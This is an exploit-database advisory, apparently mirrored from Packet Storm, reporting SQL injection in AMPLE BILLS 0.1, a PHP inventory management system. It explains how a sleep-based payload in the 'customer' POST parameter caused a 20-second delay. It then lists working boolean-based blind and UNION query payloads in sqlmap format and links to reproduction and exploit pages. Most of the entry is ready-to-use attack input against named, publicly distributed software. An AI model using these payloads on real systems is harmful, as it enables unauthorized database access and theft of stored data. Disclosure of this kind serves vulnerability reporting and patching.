Share
## https://sploitus.com/exploit?id=PACKETSTORM:178055
## Title: AMPLE BILLS 0.1 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 04/13/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The customer parameter (#1*) appears to be vulnerable to SQL injection  
attacks. The payload (select*from(select(sleep(20)))a) was submitted  
in the customer parameter. The application took 20017 milliseconds to  
respond to the request, compared with 4 milliseconds for the original  
request, indicating that the injected SQL command caused a time delay.  
The database appears to be MySQL. The attacker can get all information  
from the system by using this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: #1* ((custom) POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: customer=(-2876) OR  
5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 1 column  
Payload: customer=(-8147) UNION ALL SELECT  
CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024  
- 04/13/2024  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)  
  
## Time spent:  
01:15:00